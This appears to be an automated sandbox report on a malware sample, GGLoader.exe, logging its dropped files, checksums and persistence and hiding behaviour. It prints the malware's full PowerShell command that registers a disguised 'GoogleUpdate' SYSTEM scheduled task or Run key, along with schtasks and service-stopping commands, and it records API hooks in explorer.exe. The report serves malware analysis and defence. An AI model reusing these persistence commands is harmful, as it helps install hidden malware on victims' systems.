Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: updater.exe.7.dr Static PE information: real checksum: 0x241e4c should be: 0x2471a6
Source: LicenseGet.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x36ca3
Source: LicCheck.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x49cdb
Source: GGLoader.exe Static PE information: real checksum: 0x0 should be: 0x13d5e
Source: LicSend.exe.1.dr Static PE information: real checksum: 0x241e4c should be: 0x2471a6
Source: poduiwcd.tmp.7.dr Static PE information: real checksum: 0x0 should be: 0x2ec3f
Source: LicSend.exe.1.dr Static PE information: section name: .xdata
Source: updater.exe.7.dr Static PE information: section name: .xdata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8A0942 push E95B44D0h; ret 1_2_00007FFD9B8A09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9B8811C8 push E95B46C7h; ret 3_2_00007FFD9B881209
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_007A5798 push ecx; ret 6_2_007A57AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B76D2A5 pushad ; iretd 17_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9B880E10 push eax; retf 17_2_00007FFD9B880E1D
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0D102 push cs; retf 35_2_00C0D103
Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00BF5798 push ecx; ret 35_2_00BF57AB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02F068E1 push eax; iretd 38_2_02F06949
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02F067D9 push eax; retf 38_2_02F06809
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5722B8 push rdx; retf 39_2_000002505E5722B9
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5784FD push rcx; retf 003Fh 39_2_000002505E5784FE
Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E5A94FD push rcx; retf 003Fh 39_2_000002505E5A94FE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA3C0C push ds; retf 40_2_00007FFD9BAA3C3A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA3BEC push ds; retf 40_2_00007FFD9BAA3C2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA7DDC push ss; iretd 40_2_00007FFD9BAA7DEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BAA98CC pushad ; iretd 40_2_00007FFD9BAA98DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 40_2_00007FFD9BCC73A2 push E85F7F18h; ret 40_2_00007FFD9BCC73A9
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1922B8 push rdx; retf 41_2_000001C08C1922B9
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1984FD push rcx; retf 003Fh 41_2_000001C08C1984FE
Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1C94FD push rcx; retf 003Fh 41_2_000001C08C1C94FE
Source: C:\Windows\System32\dllhost.exe Code function: 42_2_00000213111994FD push rcx; retf 003Fh 42_2_00000213111994FE
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC6222B8 push rdx; retf 43_2_00000225DC6222B9
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC6284FD push rcx; retf 003Fh 43_2_00000225DC6284FE
Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC6594FD push rcx; retf 003Fh 43_2_00000225DC6594FE

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicenseGet.exe
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File created: C:\Program Files\Google\Chrome\updater.exe
Source: C:\Users\user\AppData\Local\Temp\LicSend.exe File created: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicCheck.exe
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe File created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\LicSend.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PODUIWCD.TMP
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\dialer.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node dialerstager
Source: C:\Users\user\Desktop\GGLoader.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
